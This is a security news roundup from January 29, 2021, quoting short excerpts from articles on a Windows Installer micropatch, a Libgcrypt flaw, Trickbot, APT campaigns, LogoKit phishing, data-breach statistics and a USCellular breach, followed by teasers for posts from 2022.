OSN JANUARY 29, 2021

Fortify Security Team
Jan 29, 2021

Title: Windows Installer Zero-Day Vulnerability Gets Free Micropatch
Date Published: January 29, 2021


Excerpt: “A vulnerability in the Windows Installer component, which Microsoft attempted to fix several times to no avail, today received a micropatch to deny hackers the option of gaining the highest privileges on a compromised system. The issue affects Windows 7 through 10. Microsoft’s most recent effort to address the issue (CVE-2020-16902) was in October. A bypass, complete with proof-of-concept (PoC) exploit code emerged in late December 2020.”

Title: “Serious” Vulnerability Found in LIBGCrypt, GNUpg’s Cryptographic Library
Date Published: January 29, 2021


Excerpt: “It was discovered and flagged by Google Project Zero researcher Tavis Ormandy and affects only Libgcrypt v1.9.0. “Exploiting this bug is simple and thus immediate action for 1.9.0 users is required,” Koch noted. “The 1.9.0 tarballs on our FTP server have been renamed so that scripts won’t be able to get this version anymore.”Version 1.9.1, which fixes the flaw, is available for download.”

Title: Trickbot Is Back Again – With Fresh Phishing and Malware Attacks
Date Published: January 29,  2021


Excerpt: “In October last year, a takedown led by Microsoft disrupted the infrastructure behind the Trickbot malware botnet, but now it appears to be coming back to life as researchers at Menlo Security have identified an ongoing malware campaign which has the hallmarks of previous Trickbot activity. These attacks appear to be exclusively targeting legal and insurance companies in North America, with phishing emails encouraging potential victims to click on a link which will redirect them to a server which downloads a malicious payload.”

Title: Lebanese Cedar Apt Group Broke Into Telco and ISPs Worldwide
Date Published: January 28, 2021


Excerpt: “Based on a modified JSP file browser with a unique string that the adversary used to deploy ‘Explosive RAT’ into the victims’ network, we found some 250 servers that were apparently breached by Lebanese Cedar” reads the report published by the ClearSky. “We assess that there are many more companies that have been hacked and that valuable information was stolen from these companies over periods of months and years.”

Title: Lazarus Affiliate ‘ZINC’ Blamed for Campaign Against Security Researcher
Date Published:  January 29,  2021


Excerpt: “Microsoft has attributed a recently discovered campaign to target security researchers with custom malware through elaborate socially-engineered attacks to an APT group affiliated with North Korea-linked Lazarus Group. Google’s Threat Analysis Group (TAG) on Monday already sounded a warning about the attacks, which play the long game and leverage social media to set up trust relationships with researchers and then infect their systems with malware through either malicious web pages or collaborative Visual Studio projects. The attackers appear so far only to be targeting researchers using Windows machines.”

Title: Breach Data Highlights a Pivot to Orgs Over Individuals
Date Published: January 28, 2021


Excerpt: ”
Both the number of data breaches and the number of individuals affected by data breaches plummeted in 2020, as attackers moved away from collecting mass amounts of information and instead targeted user credentials as a way to infiltrate corporate networks to install ransomware. That’s according to a new report, out Jan. 28 from the Identity Theft Resource Center, which estimates that more than 300 million individuals were affected by data breaches in 2020, a large number but a drop of 66% over the previous year. In addition, the number of reported data breaches fell to 1,108, a decline of 19% over 2019.”

Title: LogoKit Can Manipulate Phishing Pages in Real Time
Date Published:  January 29, 2021


Excerpt: “A recently uncovered phishing kit, named LogoKit, eliminates headaches for cybercriminals via automatically pulling victims’ organization logos onto the phishing login page. This gives assailants the tools expected to effectively emulate organization login pages, a task that can now and again be intricate. Cybercriminals have depended on LogoKit to dispatch phishing assaults on in excess of 700 unique domains in the course of 30 days (including 300 in the past week). These focused on services range from generic login portals to bogus SharePoint, Adobe Document Cloud, OneDrive, Office 365, and cryptocurrency exchange login portals. ”

Title: Google Bans Another Misbehaving CA From Chrome
Date Published: January 29, 2021


Excerpt: “Google intends to ban and remove support from Chrome for digital certificates issued by Spanish certificate authority (CA) Camerfirma, the browser maker announced this week. The ban will come into effect with the launch of Chrome 90, scheduled for release in mid-April 2021. After the Chrome 90 launch, all websites that use TLS certificates issued by Camerfirma to secure their HTTPS traffic will show an error and will not load in Chrome going forward.”

Title: Reported US Data Breaches Declined by 19% in 2020
Date Published: January 29, 2021


Excerpt: “In the U.S., reported data breaches and inadvertent data exposure incidents decreased by 19% from 1,473 in 2019 to 1,108 in 2020, as did the overall number of exposed records, according to the Identity Theft Resource Center, a nonprofit organization based in San Diego, California, that provides no-cost assistance to U.S. identity theft victims to help resolve their cases. The ITRC recently released its 15th annual Data Breach Report.”

Title: USCellular hit by a data breach after hackers access CRM software
Date Published: January 28, 2021


Excerpt: “On January 6, 2021, we detected a data security incident in which unauth0rized individuals may have gained access to your wireless customer account and wireless phne number. A few employees in retail stores were successfully scammed by unauthorized individuals and downloaded software onto a store computer.” “Since the employee was already logged into the customer retail management (“CRM”) system, the downloaded software allowed the unauthorized individual to remotely access the store computer and enter the CRM system under the employee’s credentials,” states the USCellular data breach notification.”

Recent Posts

June 10, 2022

Title: Bizarre Ransomware Sells Decryptor on Roblox Game Pass Store Date Published: June 9, 2022 https://www.bleepingcomputer.com/news/security/bizarre-ransomware-sells-decryptor-on-roblox-game-pass-store/ Excerpt: “A new ransomware is taking the unusual approach of...

June 9, 2022

Title: New Symbiote Malware Infects all Running Processes on Linux Systems Date Published: June 9, 2022 https://www.bleepingcomputer.com/news/security/new-symbiote-malware-infects-all-running-processes-on-linux-systems/ Excerpt: “A newly discovered Linux malware known...

June 8, 2022

Title: Surfshark, ExpressVPN pull out of India Over Data Retention Laws Date Published: June 7, 2022 https://www.bleepingcomputer.com/news/legal/surfshark-expressvpn-pull-out-of-india-over-data-retention-laws/ Excerpt: “Surfshark announced today they are shutting down...

June 6, 2022

Title: Italian City of Palermo Shuts Down all Systems to Fend off Cyberattack Date Published: June 6, 2022 https://www.bleepingcomputer.com/news/security/italian-city-of-palermo-shuts-down-all-systems-to-fend-off-cyberattack/ Excerpt: “The municipality of Palermo in...

June 3, 2022

Title: Critical Atlassian Confluence Zero-Day Actively Used in Attack Date Published: June 2, 2022 https://www.bleepingcomputer.com/news/security/critical-atlassian-confluence-zero-day-actively-used-in-attacks/ Excerpt: “Hackers are actively exploiting a new Atlassian...

June 2, 2022

Title: Conti Ransomware Targeted Intel Firmware for Stealthy Attacks Date Published: June 2, 2022 https://www.bleepingcomputer.com/news/security/conti-ransomware-targeted-intel-firmware-for-stealthy-attacks/ Excerpt: “Researchers analyzing the leaked chats of the...

June 1, 2022

Title: Ransomware Attacks Need Less Than Four Days to Encrypt Systems Date Published: June 1, 2022 https://www.bleepingcomputer.com/news/security/ransomware-attacks-need-less-than-four-days-to-encrypt-systems/ Excerpt: “The duration of ransomware attacks in 2021...